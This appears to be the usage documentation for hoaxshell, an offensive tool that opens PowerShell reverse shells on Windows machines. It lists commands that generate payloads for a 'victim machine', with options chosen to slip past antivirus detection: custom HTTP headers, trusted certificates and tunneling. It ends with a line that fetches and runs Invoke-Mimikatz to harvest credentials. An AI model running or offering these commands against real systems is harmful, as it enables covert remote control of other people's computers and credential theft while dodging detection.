
Payload that utilizes Invoke-Expression (default)

sudo python3 hoaxshell.py -s <your_ip>

Payload that writes and executes commands from a file

Use -x to provide a .ps1 file name (absolute path) to be created on the victim machine. You should check the raw payload before executing, make sure the path you provided is solid.

sudo python3 hoaxshell.py -s <your_ip> -x "C:\Users\\\$env:USERNAME\.local\hack.ps1"

Recommended usage to avoid detection (over http)

Hoaxshell utilizes an http header to transfer shell session info. By default, the header is given a random name which can be detected by regex-based AV rules. Use -H to provide a standard or custom http header name to avoid detection.

sudo python3 hoaxshell.py -s <your_ip> -i -H "Authorization" sudo python3 hoaxshell.py -s <your_ip> -i -H "Authorization" -x "C:\Users\\\$env:USERNAME\.local\hack.ps1"

Encrypted shell session (https)

# Generate self-signed certificate: openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365

# Pass the cert.pem and key.pem as arguments: sudo python3 hoaxshell.py -s <your_ip> -c </path/to/cert.pem> -k <path/to/key.pem>

The generated PowerShell payload will be longer in length because of an additional block of code that disables the ssl certificate validation.

Encrypted shell session with a trusted certificate

If you own a domain, use this option to generate a shorter and less detectable https payload by providing your DN with -s along with a trusted certificate (-c cert.pem -k privkey.pem).

sudo python3 hoaxshell.py -s <your.domain.com> -t -c </path/to/cert.pem> -k <path/to/key.pem>

Grab session mode

In case you close your terminal accidentally, have a power outage or something, you can start hoaxshell in grab session mode, it will attempt to re-establish a session, given that the payload is still running on the victim machine.

sudo python3 hoaxshell.py -s <your_ip> -g

Important: Make sure to start hoaxshell with the same settings as the session you are trying to restore (http/https, port, etc).

Shell session over https using tunneling tools (Ngrok / LocalTunnel)

Utilize tunnelling programmes Ngrok or LocalTunnel to get sessions through secure tunnels, overcominge issues like not having a Static IP address or your ISP forbidding Port-Forwarding.

Use -ng or --ngrok for Ngrok server

sudo python3 hoaxshell.py -ng

Use -lt or --localtunnel for LocalTunnel server

sudo python3 hoaxshell.py -lt


The shell is going to hang if you execute a command that initiates an interactive session. Example:

# this command will execute succesfully and you will have no problem: > powershell echo 'This is a test'

# But this one will open an interactive session within the hoaxshell session and is going to cause the shell to hang: > powershell

# In the same manner, you won't have a problem executing this: > cmd /c dir /a

# But this will cause your hoaxshell to hang: > cmd.exe

So, if you for example would like to run mimikatz throught hoaxshell you would need to invoke the commands:

hoaxshell > IEX(New-Object Net.WebClient).DownloadString('');Invoke-Mimikatz -Command '"PRIVILEGE::Debug"'

Long story short, you have to be careful to not run an exe or cmd that starts an interactive session within the hoaxshell powershell context.

Last updated